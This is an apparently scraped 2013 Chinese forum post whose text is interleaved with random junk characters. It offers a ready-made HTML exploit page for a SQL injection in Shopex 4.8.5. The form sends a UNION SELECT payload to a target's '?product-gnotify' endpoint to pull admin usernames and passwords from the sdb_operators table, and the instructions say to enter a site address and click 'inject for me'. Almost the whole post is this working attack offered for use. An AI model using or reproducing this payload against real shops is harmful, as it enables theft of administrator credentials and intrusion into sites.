<center>
7 v( C) q+ u3 E" s<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>; |1 I2 x1 S3 p4 s0 g- m( H
<form action="" method="post" name="submit_url">
5 `) V& d6 |8 z3 m5 V7 B2 F网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
; \4 a) [/ D9 ?0 @<input type="hidden" name="goods[goods_id]" value="3">
7 t/ _8 x+ X- [" r<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">( e; @$ o& L! M, E; v
<input type="submit" value="给我注入" onclick=fsubmit()>
N% u" w% z5 Z- o n4 }</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com* Q( S) r p2 E: h- C" _0 h
. W6 u6 {: G' p# _' q/ [
<script> + X4 r. q. R7 {# k, |' v
function fsubmit(){ / `. w7 |; _9 |: t2 v
form = document.forms[0];
3 N9 k' d" i1 H& ~3 l b. qform.action = form.url.value+'/?product-gnotify';
1 y6 J5 o3 D9 r2 a* wform.submit();
. l& m# R: ~5 G- ~1 D$ d} ! O8 ]7 } k6 \9 g; ], ?2 F C5 w( o
</script>- l) l% [6 ~/ O' V
|
发表于 2013-1-23 09:20:52
收藏
支持
反对